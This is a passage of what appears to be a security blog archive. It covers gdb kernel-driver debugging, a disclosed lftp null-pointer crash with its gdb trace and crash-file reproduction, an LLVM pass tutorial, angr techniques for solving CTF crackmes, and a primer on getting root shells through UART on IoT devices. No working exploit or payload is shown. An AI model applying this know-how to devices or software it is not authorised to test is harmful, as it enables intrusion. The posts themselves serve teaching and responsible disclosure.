Breakpoint 1 at 0xffffffffa0000010: file drivers/debug_driver//debug_driver.c, line 81.
(gdb) c

Cool lets execute the driver program so we can trigger the code we want:

root@syzkaller:$ gcc -o debug_driver_app.elf debug_driver_app.c

root@syzkaller:/home# ./debug_driver_app.elf
Usage: ./debug_driver_app.elf [message to write] [read length]

root@syzkaller:$ ./debug_driver_app.elf "hello" 10

[ 160.083320] [debug_driver] message successfully copied message => [hello]
[ 160.083326] [debug_driver] buffer copied to message holder
[debug_driver] r[ 160.086175] [debug_driver] device released

This should trigger the dev_read function; and as we can see in the attached debugger:

Thread 2 hit Breakpoint 1, dev_read (filep=0xffff888067c29dc0, buffer=0xffff888067c29dc0 "",
len=16, offset=0xffffc900002c7eb8) at drivers/debug_driver//debug_driver.c:81
81 error_count = copy_to_user(buffer,message,len); //copy out of message into buffer

So thats the breakpoint hit! We achived our goal for this post, if you'd like to explore more try setting more breakpoints and before moving on to the next post make sure to get your gdb foo up. Next post is going to look at exploitation of stack vulnerabilities.

References and Reading

[Memory Corruption Bugs] Lftp Null pointer dereference (<= 4.9.1) in CmdExec::FeedCmd

2020-06-20T23:53:00.000-07:00

Date: 06-21-20
Vendor Homepage: https://lftp.yar.ru/
Software Link: http://lftp.yar.ru/ftp/lftp-4.9.1.tar.gz
Version: <= 4.9.1
Bug link: https://github.com/lavv17/lftp/issues/593

I've discovered a null pointer deference bug in LFTP version 4.9.1 which probably affects previous versions. The bug occurs in CmdExec::FeedCmd and triggers in strlen due to a null pointer argument. The following gdb trace demonstrates

this:

(gdb) r -f lftp_cmdfile_fuzz/crashes/id:000000,sig:11,src:000000,op:havoc,rep:4
The program being debugged has been started already.
...
Breakpoint 5, 0x0000000000461b61 in CmdExec::FeedCmd(char const*) ()
(gdb) x/5ig $rip
=> 0x461b61 <_ZN7CmdExec7FeedCmdEPKc+97>:    callq 0x43a3a0 <strlen@plt>
   0x461b66 <_ZN7CmdExec7FeedCmdEPKc+102>:    mov    %rbx,%rdi
   0x461b69 <_ZN7CmdExec7FeedCmdEPKc+105>:    mov    %r14,%rsi
   0x461b6c <_ZN7CmdExec7FeedCmdEPKc+108>:    mov    %eax,%edx
   0x461b6e <_ZN7CmdExec7FeedCmdEPKc+110>:    add    $0x8,%rsp

(gdb) x/1xg $rsi
0x0: Cannot access memory at address 0x0 <--- argument passed to strlen is a null pointer
(gdb) ni

Program received signal SIGSEGV, Segmentation fault.
__strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65
65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory.
(gdb) i s
#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65
#1 0x0000000000461b66 in CmdExec::FeedCmd(char const*) ()
#2 0x00000000004726f7 in cmd_subsh(CmdExec*) ()
#3 0x0000000000462fa1 in CmdExec::exec_parsed_command() ()
#4 0x0000000000468d60 in CmdExec::Do() ()
#5 0x0000000000563a76 in SMTask::ScheduleThis() ()
#6 0x000000000056325d in SMTask::Schedule() ()
#7 0x00000000004604ce in Job::WaitDone() ()
#8 0x000000000043edfd in main ()

Testing this on the latest binaries from the Ubuntu repository

>$ lftp -v
LFTP | Version 4.8.4 | Copyright (c) 1996-2017 Alexander V. Lukyanov

LFTP is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
...
>$ lftp -f ../lftp_cmdfile_fuzz/crashes/id\:000000\,sig\:11\,src\:000000\,op\:havoc\,rep\:4
Segmentation fault

Some closing remarks: I've reported the bug to the Debian folks so they are aware, it didn't make the bar for a vulnerability but I think this may constitute a problem on some platforms and speak towards bigger problems in the lftpd code base. I don't know of any public ways to exploit this but I'm posting it so there is public record and awareness.

[Learning LLVM I ] Introduction to the LLVM Pass Framework

2020-04-06T04:36:00.000-07:00

Hi folks, its been a while! In this post I'm going to talk about getting started with LLVM and I'll discuss writing a basic pass which we will build on as the post series develops.

Why LLVM?

LLVM is becoming really popular, with a sprawling community behind it and a string of research projects contributing plugins and passes there's ever more reason to get involved and hack out some passes of your own.

We should start with what is LLVM? LLVM formerly standing for "Low Level Virtual Machine" (I hear the acronym no longer means this) now refers to a collection of tools that comprise a whole compiler architecture and tool chain. There are components that debug, instrument code, link libraries and much much more. In this post we will be focusing on llvm as it pertains to the set of libraries for interacting with the compiler internals called the LLVM Pass Framework.

An important thing to know about LLVM before we move on is its modular design. The actual compiler is comprised of 3 seperate components namley the:

Front-end - which handles lexing and compiling code into LLVM's intermediate representation (more on this in future posts). IR is a powerful tool in compilers especially here because it means whatever strange language you generated the IR from doesn't really mean anything to the phases going forward. LLVM can be re-targeted for pretty much whatever you can contrive into bitcode or IR.
Optimizer - The optimizer performs uhm well optimization on the IR passed to it. There are a ton of different optimzations (I believe some papers speak of something like 100 different loop optimzations for instance). The optimizer strips out as much redudent look ups or dead variable assignments as possible all backed by the static single assignment (SSA) form (each register is only assigned a value once). This SSA grammar form allows the compiler to isolate imporant properties and anomalies in the langauge that would otherwise be quite ambiguos and tedious to code around.
Back-end - This part of the compiler emits the actual machine depedent assembler code. If you want to participate in the machine dependent code generator then writing a MachineFunctionPass is for you since it kicks in everytime a function is rendered in machine dependent code (I discuss the pass types further on in the post). Useful reasons to do this might be to check for differentials in the IR vs machine code, maybe to nuke certain instructions like cache flushing incase code is trying some side-channel attacks, maybe inject functions that force it to run with a conditioned cache to defen aginst attacks or instrument specific asm side effects at machine level and im sure tons more awesome stuff.

We can see from the diagram above that IR floats between the different stages meaning passes actually operate on llvm IR. This means you can't run into this assuming that you can filter for stack base register behavior or instruction pointer weirdness. You'll have to get to grips with LLVM IR if you mean to do anything useful with the framework, its the lingua franca of the compiler so learn it good.

This video is an excellent introduction to the LLVM IR concepts please check it out if you're looking or a well structured and well delivered introduction https://www.youtube.com/watch?v=m8G_S5LwlTo .

Here come the compiler bugs

A motivating factor for security folk like me is the advent of nifty security bugs in code that stem from compiler optimizations. One really good example is a bug termed "memsad". The key issue here is applying aggressive optimizations to certain contexts of the memset call (Illja Van Sprundel from IOActive originally showed me this bug, defo check out what he has to say [https://media.ccc.de/v/35c3-9788-memsad]).

What we learned here is that optimizations can actually remove memset calls that could be used to clear cryptographic materials from memory. The memset optimization can culminate in almost heart-bleed like conditions, directly compromising cryptographic operations if they go unchecked for too long or appear in too many contexts.

To clarify what I'm talking about here's a potential example of memsad in something called RIOT-OS:

Extract from https://github.com/RIOT-OS/RIOT/issues/10751

In the code above you can see the code call memset (on line 14) with a buffer as an argument, and then not use the buffer after that point just before returning. What this means in short is that GCC (including some other compilers) will not mark it as "in-use" after that point (after line 14) and remove the memset during optimization; correctly assuming that it has no impact on the outcome of the function. The result being that in the code actually being run, the memset will not be called.

Of course if that buffer happens to hold a hash of something sensitive or a private key, this means taht when the function returns these values will be available in memory; potentially leaked out to disk during swaps or divulged during any number of kernel memory disclosure vulnerabilities. Either way if you are serious about controlling access to your crypto, this bug can be a big problem because means you no longer have a solid grasp of where exactly in your org cryptographic materials are accessible.

Anyway the point I'm trying to make here is that the internals of a compiler matter in a security sense. The existance of this bug, immediately means other examples exist, at the least as more contrived examples of this one. And in order to get a view of where these bugs come from obviously that means either trudging through unfriendly compiler code or hooking into a framework specifically designed to give you purchase on the internals of the compiler, LLVM is trying to be this framework.

In order to invoke some of the magic of LLVM one can write "passes" using the nifty API LLVM forwards. The next section discusses some background on these passes and gets you going with your first one.

Your first Pass

To start, I should say that compilers don't do everything in a single run at your code (well at least LLVM doesn't), most compilers resort to a simple strategy of do things in separate "passes" over the code. This effectively means that it will pass over the code once to achieve a certain goal and then when a desired property emerges from the code (like provably correct syntax, efficient array look ups, etc) it will be hit with more passes until it is rendered into compiled machine code (or LLVM bit code if thats your target).

LLVM gives you access to these passes via something called the LLVM Pass Framework (documentation linked below). The way this works is you write an instance of of the llvm::Pass class with methods that get called during each of the instantiated pass types and you get to tell it what to do with the code! Pretty cool right? You are literally writing a compiler here, and if that doesn't get you laid then I dunno what will.

Anyway here's a list of some of the passes LLVM has APIs for:

Module Pass - When you write a module pass your methods will trigger in a context that gives you view of the entire script (a .c/c++ file) being processed as a single unit. Whats neat about the Module Pass is that you can trigger analysis on functions from the Module Pass, in know this sounds redundant but imagine trying to process function semantics and say, needing context of the global variables, or seeking to optimize FunctionPass specific stuff by triggering some analysis from view of the entire script first i.e setting up your shadow memory manager, collecting metrics on the module etc.
Function Pass -the function pass as the name indicates triggers on Functions as stand alone units, this is obviously very useful functions are where the action happens! There are some caveats though to using these though because of the out of order mode of processing, you shouldn't expect to hit each function in your pass in a given order or depend any analysis on it. More important caveats are mentioned on the LLVM site (check out "Writing an LLVM Pass" in the reference section).
Loop Pass - Loop Passes run on you guessed it loop definitions in context. It actually processes nested loops starting from the inward out, meaning the last loop in a collection of nested loops will be the outer-most one i,e, loop A{ loop B { loop C} } will be processed C->B->A. These passes are great for performing quick optimizations on loops for instance if you're loooking for any code that may have interesting cache behaviour, you can whip up a loop pass and model for instance what the cache would look like during loop. Other more obvious applications could be things like simplifying array operations, removing statements that don't affect computation or slow down loop speed.

There are a few other very powerful pass types I'm not mentioning here for the sake of brevity namely the RegionPass, CallGraphSCCPass and the MachineFucntionPass, if you need the deets on these I suggest checking out the LLVM documentation in the reference section.

The general pattern to employing LLVM to do stuff is having one part of your code collect data and another analyze data. For instance lets say you're looking for use-after-free's you could have on part of your code tag and log all the calls to free() and another collecting these contexts to see if there are any funky things going on. Point I'm making here is there is usually a collection phase and an analysis phase loosely speaking. For us these will be a bit compressed in our first example pass because we're just going to spit out all the function calls and make LLVM tell us the name of the function being called.

The Code

Here's the code for our first LLVM pass, don't fret I'll explain whats going on right after the code snippet:

Lines 1-6 are pretty straight forward they just make sure all the relevant namespaces and function definitions are accounted for, more important to discuss is the code on line 9:

9 struct FunctionNamePass : public FunctionPass {

Here we are declaring what kind of pass we want and what our instance should be called, namely we're writing a pass of type llvm::FunctionPass called "FunctionNamePass". If you'd like to check out the documentation for the FunctionPass class its available here ().

Moving on we then give it an ID member field so the LLVM Pass framework can uniquely identify it. Then finally in line 13-16 we implement the llvm::FunctionPass::runOnFunction(Function *) which is the star of the show as far as getting stuff done goes. This function is where you put all the analysis you want to do, pull out function calls, check arguments etc etc. The argument stuffed in here is a pointer to a Function type, which is the current function being analyised. In line 14 we can see the code do the following:

14 errs() << "[*] function '" << F.getName() << "'\n";

Which is a contrived way of printing to stderr (via the errs() call) , and calling getting the function name with the nifty Function::getName() method.

We now have a defined runOnFunction method and we can move onto registering our pass so that clang can pick it up. We're doing this so that we can use the clang -Xclang -load -Xclang command (more detail on this in the next section) to invoke our pass, though there is an alternative way discussed near the end of the post. Doing things this way makes the story a little shorter and easier to understand. So how do we get clang to see and invoke our pass automatically? We make use of LLVM's Pass registration.

Here's the code that registers our Pass (lines 24-30):

24 static void registerFunctionNamePass(const PassManagerBuilder&, legacy::PassManagerBase &PM) {

PM.add(new FunctionNamePass());

}

28 static RegisterStandardPasses
RegisterMyPass(PassManagerBuilder::EP_EarlyAsPossible,
registerFunctionNamePass);

Above we can see the registerFunctionNamePass which is a call back we are defining that will register our pass for us, you can name this anything of course, the important thing is that it stuffs an instance of our pass in the legacy::PassManagerBase::add( ) function. Next we need to pass our registration call back to the actual pass registration system, this is done by making an instance of RegisterStandardPass in line 28.

Okay so that pretty much makes up all the important aspects of the pass, we can move onto compiling and running it, this is dicussed in the next section.

Compiling and Running

Okay so our pass is all scripted up we need to be able to build and run it. To get that done we're gonna need to setup a folder structure and some CMakeLists.txt's. To skip all the headache involved in this I suggest checking out a repo that has all of this already pre-cooked, I relied on this repo by Adrian Sampson https://github.com/sampsyo/llvm-pass-skeleton.

CMakeLists.txt will expect to appear with a folder named FunctionName (this is what we are renaming Skeleton.cpp to) in its path like so:

llvm-skeleton-pass
├── CMakeLists.txt
├── FunctionName
│ ├── CMakeLists.txt
│ └── FunctionName.cpp
Where the top level llvm-skeleton-pass/CMakeLists.txt looks as follows:

And the sub-level on under FunctionName/CMakeLists.txt looks like this:

Once your folders are set up good, you can make your build folder and pump out some cmake and make action:

cd llvm-pass-skeleton
mkdir build
cd build
cmake ..
make

If everything goes well you should see the following output:

>$ cmake ..
-- The C compiler identification is GNU 9.2.1
-- The CXX compiler identification is GNU 9.2.1
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Configuring done
-- Generating done
-- Build files have been written to: /home/kh3m/Research/llvm/tutorials/llvm-passes/build

>$ make
Scanning dependencies of target FunctionNamePass
[ 50%] Building CXX object FunctionName/CMakeFiles/FunctionNamePass.dir/FunctionName.cpp.o
[100%] Linking CXX shared module libFunctionNamePass.so
[100%] Built target FunctionNamePass

We can then run it by invoking the following command:

>$ clang -Xclang -load -Xclang FunctionName/libFunctionNamePass.so ../radamsa.c
[*] function 'main'
[*] function 'find_heap'
[*] function 'setup'
[*] function 'load_heap'
[*] function 'vm'
[*] function 'onum'
[*] function 'read_heap'
[*] function 'heap_metrics'
[*] function 'get_obj_metrics'
[*] function 'get_nat'
[*] function 'set_signal_handler'
[*] function 'signal_handler'
[*] function 'decode_fasl'
[*] function 'get_obj'
[*] function 'get_field'
[*] function 'mkraw'
[*] function 'gc'
[*] function 'mkpair'
...

You may not have a radamsa.c in your folder, any C code should suffice I just like using radamsa because its standalone, doesn't have any complex dependencies and comes packed with all kinds of crazy code to test on.

Alternatively you can invoke your pass by using opt which is the way the LLVM documentation does it, more on that method here: https://llvm.org/docs/WritingAnLLVMPass.html#running-a-pass-with-opt

Okay I think this is a good place to end this post, we will carry on adding stuff to or Pass as the series goes on so stay tuned!

References and Futher Reading

LLVM For Grad Students - https://www.cs.cornell.edu/~asampson/blog/llvm.html
Static Single Assignment (wikipedia) - https://en.wikipedia.org/wiki/Static_single_assignment_form
llvm::Pass Class Reference abstract - https://llvm.org/doxygen/classllvm_1_1Pass.html
RIOT-OS https://github.com/RIOT-OS/RIOT/blob/master/sys/crypto/helper.c#L38-L44
Memsad why clearing memory is hard. (CCC, 2018) - https://media.ccc.de/v/35c3-9788-memsad
LLVM: A Compilation Framework forLifelong Program Analysis & Transformation (2014) - https://llvm.org/pubs/2004-01-30-CGO-LLVM.pdf
The most dangerous function in the C/C++ world (2015) - https://www.viva64.com/en/b/0360/
2019 EuroLLVM Developers’ Meeting: V. Bridgers & F. Piovezan “LLVM IR Tutorial - Phis, GEPs ...” - https://www.youtube.com/watch?v=m8G_S5LwlTo
Loop Optimization Framework - https://arxiv.org/pdf/1811.00632.pdf
LLVM Skeleton Pass (Adrian Sampson) - https://github.com/sampsyo/llvm-pass-skeleton

[Symbolic Execution 0x1] Modeling registers and setting constraints

2019-12-31T10:37:00.000-08:00

Hi folks, in the previous post I covered a simple example showing how Angr can speed up solving keygen / crackme type challenge. In this one I'm covering an explanation of how symbolic modeling of registers works with Angr and throwing in a weird little problem that required argv constraints to solve.

If you're joining us at this post and find yourself a little lost, then please check out the previous one in the series available here:

[Symbolic Execution 0x0] Solving Easy CTFs with Angr and Symbolic Execution

In the series I'm covering some tricks you can pull of with Angr to model execution states and get some quick solutions to a few novel CTF challenges. As for this post; we move on to modeling register values as part of our initial state and setting constraints on argv or any parameter as part of a solution or initial state.

I'm finding that the key to getting really good at Angr is learning the different parts of its vocabulary for describing execution states, it provides ton's of ways to setup an execution state at an arbitrary place in a binary and then crunch away until exhausts all the potential value for the variables you mark of in the "equation". Obviously the more obscure an execution state you can describe using Angr the better you'll be able to apply to Malware, Rootkits or other contrived binaries.

Setting Constraints with Angr

As we know by now the aim of the game is to describe an execution state that models our targeted place in the binary, part of the power you have over this initial state is placing constraints on the values we want to search through for our solution. The following example shows just that for the argument passed to a binary via argv.

To start, here's what our binary looks like:

Ensuring we are on the same page with the analysis, what you should note is:

First couple instructions @0x6d2 and @0x6d5 pull the argv pointer and the value for argc. It then checks that we have at most (jg instruction 0x6dd) 1 argument.
The next code block of interest @0x6f5 ensures that the argv[1] value is a string of length 5
Then the most crucial check for the purpose of our example happens: 0x718 to 0x72c we can see that the binary ensures that: the first character value of the argv[1] string is less than 0x40 - 1; which implies then that its looking for 0x3F as a character value.

Then it does some weird crap with the argv[1] string from lines 0x738 to 0x77b, finally making decision (based on eax) if we win or not. Again, because of the magic of Angr we can ignore the entire code block and focus solely on the fact that:

It's a "function" of rbp-0x10 or argv[1] value.
It requires some attributes to be met for argv[1] if we are to reach the "weird crap".

We now know enough to model an execution state that will solve for the argv[1] value.Here's how you do it:

If you've been working through some Angr examples yourself you shouldn't need a detailed breakdown of every line, I'm not going to bloat this post by reworking through them either, if you need the catch up work, please check out the previous post. The one addition you can see here though is in line 14:

initial_state.add_constraints(argv.get_byte(0) == 0x3F)

To spare you the mystery this ensures that whatever value's it trudges through for our ear-marked argv[1] variable; the first byte will be hard set to 0x3F.

Constraints like this can really speed up your search and avoid Angr running through tons of options that will never produce a solution; so if you're in the business of solving problems quickly and you'd like to show of your skills with Angr (especially because it runs in python); look out for obvious checks like this, every single character your can squeeze out as an optimization will save you a butt load of time!

Okay so you probably don't believe me that this will find the solution, I need provide hard proof! Here's the run:

I know super obscure value lol and I'm not even sure if the designer of the problem meant for this very strange value to be the actual solution - but that might not matter because the binary clearly likes it and it definitely gets us the flag!

Quite a random place to start but I though it eased us into things well, a slightly more complex example follows.

Modeling Registers

Registers are an import part of calling conventions. What this means is depending on how you model, and to what fine a grain you'd like to model a binary, registers will frequently play a huge role in which function gets a certain argument.

To start off, lets look at our example binary:

and to expand on the get_user_input function:

This one comes straight from the examples Angr provides and as boring as it is to use this an example; I hafta admit the examples they provide are good, they are even provided in some form of a grammar; so you can work out how to grow more examples from the one's the Angr folks provide (those of you dedicated mastering this will appreciate that). It does mean you will be able to get these explanations from other posts but the upside is: it also gives you different working and explanations for the same stuff, and often that redundancy really helps speed up cracking the strange enigmas involved in understanding symbolic execution (or anything for that matter!).

Analyzing our binary we see the following important things:

After getting the values via scanf, in lines 0x8048934 to 0x8048944 it transfers them via the pointer arguments given to scanf, to the registers eax,ebx and edx.
In the main, after it calls get_user_input it transfers the register values eax,ebx and edx to memory pointers, from line 0x8048980 to 0x8048986
We can also see that at line 0x804898c the binary passes the eax value to complex_function_1, in the same suite the ebx and edx are passed to complex_function_2 and 3 respectively (at line 0x804899f and 0x80489b2).

Skipping some unsurprising analysis, complex_function_1,2 and 3 are crucial in determining our success and they are obviously functions of our eax,ebx and edx registers. We also probably don't need to model the memory pointer's themselves since they caught nice and neatly by 3 separate registers.

We want to therefore use Angr to model these registers while avoid involving ourselves with the internals of scanf or any unnecessarily stack pointer/memory politics (thanks to other blog posts on this subject, see "reading and references").

Here's our solution script:

We can see some new hotness in the script in lines 16-18:

init_state.regs.eax = arg0
init_state.regs.ebx = arg1
init_state.regs.edx = arg2

Pretty straight forward here, it gives the initial state a heads up and ties some claripy bit vector values to the registers mentioned. This is a very simple example and doesn't involve much drama except for the analysis needed to spot the registers we need to target.

And as for the proof:

Gets to the right solution! Anyway that's it for this one look out for more Angr goodness in future posts.

Reading and References:

"Introduction to angr Part 1" - https://blog.notso.pro/2019-03-25-angr-introduction-part1/

[Symbolic Execution 0x0] Solving easy CTFs with Angr and Symbolic Execution

2019-12-29T04:34:00.003-08:00

Hi folks, I just learned a couple nifty tricks with angr, a popular symbolic execution framework with a very slick python front end. Turns out this tool makes solving the odd crack me CTF extremely easy, I've been porting the same script around for a number of CTF challenges and it's knocking em down like nobody's business. So in the following post I'm going to give you folks a quick crash course in using the tool and show you how easy it is to solve a sample crack me.

What is Symbolic Execution

Without going into full academic detail symbolic execution is essentially hard proof that all the algebra you learned in high school is kinda nifty. Symbolic Execution engines model a program's behavior based on the inputs they are given. These engines (which may vary in their approach) operate by building a database of algebraic statements about a program, sweeping up all the possible assignments and comparisons that may result in a concrete state, after which you are then allowed to query these statements to see if a certain assignment of variables makes a given state reachable. To quote a really helpful paper on this:

More specifically, a symbolic execution engine replaces input
with “symbolic input”—analogous to an algebraic variable—and walks through code paths, “constraining” the symbolic input at each branch such that an input to the
program that satisfies all constraints will cause the program to reach that particular path. The engine can then explore many possible execution paths until it identifies a
specific path or program state of interest, at which point
it can determine the input which would trigger it. - "Teaching with angr: A Symbolic Execution Curriculum and CTF∗" @ https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf

Another good explination:

Symbolic execution is a technique that explores feasible paths by setting an input value to
a symbol rather than a real value. The symbolic execution was first published in King’s paper in
1975 [12]. This test technique was developed to verify that a particular area of software may be
violated by the input values. The symbolic execution is largely divided into the offline symbolic
execution and the online symbolic execution. The offline symbol execution solves by choosing only
one path to create a new input value by resolving the path predicate [13]. - An Automated Vulnerability Detection and Remediation Method for Software Security https://www.mdpi.com/2071-1050/10/5/1652

The analogy you should reach here is that its very similar to solving for "x" in an algebraic equation. We're going to look at a couple different scenarios with Angr and see how exactly you solve for x, but to start we will use a simple approach and let Angr do most of the thinking for us, taking advantage of the clear signals indicating the desired state in a program i.e we're going to make Angr try everything until the program literally reports "Good job" or "correct" or whatever gets printed to the screen to indicate that.

Having read the above I don't want you to assume this will take all of the reversing fun away, you will need to tell Angr where to start and stop and what to look for, and this insight will come from reading the code yourself, there maybe more contrived "win-states" or more complex phases to getting the correct input into a target function so don't completely abandon you RE skills just yet hehe.

Simple Example with Angr

The following example shows a CTF challenge I got form a random site, to spare the contestants of the site I won't mention where its from in case folks are still trying to solve this one, but its a pretty easy challenge so I doubt too many will be super upset by the solution being shown here. Anyway here's what the binary looks like:

To give you a quick summary of whats going on:

@0x830 we can see the binary grab the argv pointer from the rsi and store it at rbp-0x20 (called var_28)
@0x858 argv[1] is passed to a sub routine called "checkPassword()" via rdi
@0x867 the checkPassword return code (via al register) is checked against 0, if it is 0 the win state is assumed and "Jackpot" is printed to the screen

We aren't even going to cover what checkPassword does or whether there's some cool xor crib or double pad to exploit, we don't need to know! Angr will sort out all the work for us, via the Al-Kawarithmic magic of algebra!

So now we know where to aim, we want to know how to get to the code block @0x869 by giving it a string through argv[1], lets see if we can configure Angr to solve this.

Controlling your Angr

It be a little complex just jumping straight in so lets talk about the general process of breaking down some symbolic execution with Angr. Here's how the process usually goes:

Define a win condition - for the first couple times you use Angr, and for most simple CTFs this is as difficult as telling which address to look for as a reachable state or telling it to report on input that results in something being printed to the screen.
*(optional) Define a fail condition - you may not need to do this, but you can also tell Angr to avoid certain code blocks in the solutions it posts, again just a simple criteria for the constraints it will search through.
Load up a binary - Not complex at all, this consits of a single API call to tell Angr which binary to analyze.
Define Variables -,this tells Angr which values you are ear-marking as criteria for a win state basically warning it to keep an eye out for how these values influence execution. Also a simple set of API calls and may vary with complexity depending on if your values are in registers, coming form the command line, or are just a collection of memory addresses.
Set an initial state - Very important, this is us telling Angr's simulation manager where in the binary we want to get the party started. We can point it at any place in thee binary given it makes sense to execute from there (paying attention to stack conservation and arguments!)
Solve! - this the part where you tell Angr to make the magic happen.

So to summarize, you basically setup a start execution state, and then tell Angr to run all the goodness until it matches a given criteria.

Scripting up a solution

The following script details the solution.

I've commented the crap outta this but I will line by line this as previous posts on the subject have.

The first line we see doing anything interesting is at 8:

project = angr.Project(elf_binary) #load up binary

This essentially tells angr which binary we want to tagret. The next line declares a Bit Vector String using Claripy so we can ear mark the argv[1] argument for constraint solving.

arg = claripy.BVS('arg',8*0x20) #set a bit vector for argv[1]

Why a bit vector? Well given that we want to represent all the possibilities for the input, should it not actually require a simple character (guessing only at character level) but some obscure value of bits, telling Claripy we want a vector of individual bit values makes sure we don't miss any details. Modeling the input this way is much more fine grained an realistic, imagine we are modeling some linux driver input here, you definitely want all the possible bit values since some will represent over/under-flowed integers.

Claripy is the constraint solver for Angr, again we need not delve too deep into how it works; but for claripy's sake you can imagine that this builds Abstract Syntax Trees based on the disassemble'd source in order to structure the arguments stuffed into sub-routines and math procedures, the arguments can be modeled as a couple of different things in order encompass different aspect possible of the input. Better coverage of this can be found at Angr's documentation page (https://docs.angr.io/advanced-topics/claripy ).

I've made it way larger than it need be, and if you'd like to model yours a bit tighter you may use some information in the disassembly to declare a smaller BVS for your script.

We now need to tell Angr to pay attention to this value, just grabbing an instance of a bit vector is not enough, we need to stuff it into a call that associates it to our project, that happens in line 11:

initial_state = project.factory.entry_state(args=[elf_binary,arg])

Nothing to hard here, we then take this and use it to setup our simulation manager, the thing that steps through our program and checks for the goodness, from line 12-13:

simulation = project.factory.simgr(initial_state)
simulation.explore(find=is_successful)

Angr's simulation manager is pretty nifty, i recommend taking a look at the other amazing options and api calls fleshed out for it here (https://docs.angr.io/core-concepts/pathgroups). For our purposes here we will stick to just telling it where we want to start and when to consider its exploration a success. The last part we need to make sure is defined is the win state, in line 13 we gave the explore function a parameter named "is_successfull" this is a method name that Angr will call on each state it calculates matches our solution, we need to tell it when to return True or False so it knows what we want. For us this means checking the standard output for a certain string "Jackpot":

def is_successful(state):
output = state.posix.dumps(sys.stdout.fileno())
if b'Jackpot' in output:
return True
return False

This is a typical function call handler style API, you stuff this method name in somwhere as a parameter and in the internal magic of Angr it gets called over and over until a true is reached. What you should pay attention to here is the parameter passed to it, later on you may want to be a bit more creative than just string matching the standard output, so check out what other properites a "state" has in terms of angr's docs and it will give you other ideas you can configure the simulation manager to halt on. Obvious examples being, register values (eip, eax, etc etc) or values in a given memory region or a function of how many times a given code block is hit, the possibilities are endless (in exception of whatever the halting problem prevents you from using as a criteria lol).

Checking this for a solution we see it quickly finds the right string:

Okay so that's pretty solid proof we have the correct answer, I think if you've just started out with Angr you may want to grab this script as a starting point and add small modifications to it to see if you can pump out solutions for other CTF challenges.

happy hacking!

Reading and References

Introduction to Angr (part 1) https://blog.notso.pro/2019-03-25-angr-introduction-part1/
Angr offical documentation https://docs.angr.io/
Teaching with angr : a Symbolic Execution Curriculum and CTF* - https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf

[Hardware] Reverse Engineering UART interfaces (Primer)

2019-06-03T12:52:00.000-07:00

In this post I'm going to run through a crash course about UART, and write up some personal notes I use to find them quickly and dump shells on embedded devices. So is going to be a little informal at times but the aim of the post is to get the tips and process across quickly so those who want to can get to dumping shells too! So this focused on supporting the activity of interacting with UART ports as they appear on an average IoT device.

This is me dumping dump UART traffic from a device using the Adafruit R232-TTL FTDI cable.

TL;DR

UART exists, its stands for Universal Asynchronous Receiver-Transmitter
It usually comes in at least 3/4 pins Ground (GND), Transmit (TX), Receive (RX), Power (Vcc)
The pins on a board are usually close together and in line, grouped together (especially if the PCB factory uses automated testing on the ports)
Its a serial protocol which means bits are signaled one after the other
Generally used for debugging; implementations often grant root access.
To drop a shell (sub-TL;DR):

Hook up the UART signals to a USB friendly connector
Open a serial console

What is UART?

Well lets start with the name Universal Asynchronous Receiver-Transmitter. The Asynchronous part means that the protocol doesn't explicitly define an external clock to synchronize communication to i.e. one bit transfer per clock edge or clock cycle or every 36000 clock cycles or any "computable" function f(clock_cycles) hehe.

A clock signal if you're not familiar is something that offers are regular fluctuation of signal (whatever your signal is made of, rats or electrostatic force). Why does this help computation? Why do you need a clock? Clocks are there for many reasons, most of the important one's being mathematical and theoretical (I erased my rant about successor functions and primitive recursion many times but you can check out more here https://plato.stanford.edu/entries/computability/ ).
Anyway; they allow us to distinguish somethings place in a "set" (whatever your set is made of, bits in a byte, memory addresses in a kernel pool, button presses in a time frame etc), or prove that something happened at a given time and synchronize actions between different modules or computing things. Clocks are pretty much always there, the only real difference is whether they are inferred from other aspects of the context; either through the rate at which data is flip flopped out of the chip (the maximum amount of times signal state is allowed to change); or by a literal externally supplied signal.

Anyway UART could be a bit of strange place to start if you're not used to the hardware stuff (which I'm not entirely used to yet either!) so i thought I'd come in on a bit of a softer landing and talk about communication protocols in general.

Communication can happen in some of the following ways :

One a single wire one bit sequentially following the other - Serial
Multiple wires each signalling a bit at the same time - Parallel
Signalling based on the difference between signals - Differential
more things exist probably...

UART is on the serial side of things ("I'm super serial you guys" - E. Cartman), each bit is physically signaled down one after the other. Its important to know this because it affects how you interact with the device and sample from it. This orientation of bit signalling will theme how you navigate the errors and pitfalls when interacting with it - this again because you need to line up the bits according to a clock to argue that they were received correctly. For instance if it were parallel, and you don't have all your signals hooked up you're gonna read garbage lol. Another example if you're reading serial stuff and you aren't making good contact ALL THE TIME or if your device doesn't sample fast enough; you might see a broken clock, and not be able to interpret data correctly. So knowing what the orientation of the bit stream is gonna be is pretty crucial. Anyway on with the UART!

UART comes in many variants there are modifications that cater to faster data transfer, error correction and parity bit states, etc etc. In this post I'm going to show what a stock standard UART looks like for a random embedded devices I've been torturing lately. Before we get into the pins and signals lets look at a simple state machine for the protocol (because after all, even if you're engineering hardware the computer scientists are still frigging amazing at math). The FSMs for UART I'm going to show are for the RX (Receive signal, which will accept data for the UART host; and the TX (Transmit signal, which will send data from the UART host).

State Machine for RX:

Just to provide some clarity on my weird notation the 1,0[8] - means that the state will loop 8 times gobbling up the bits (either 1 or 0). For the latest example the bits are being "gobbled" by being signaled out through RX. Also the "e" means that you don't need any input to transition to this state, some real implementations of UART have states like this; usually to reset the data buffers and counters so they can catch more data when its time.

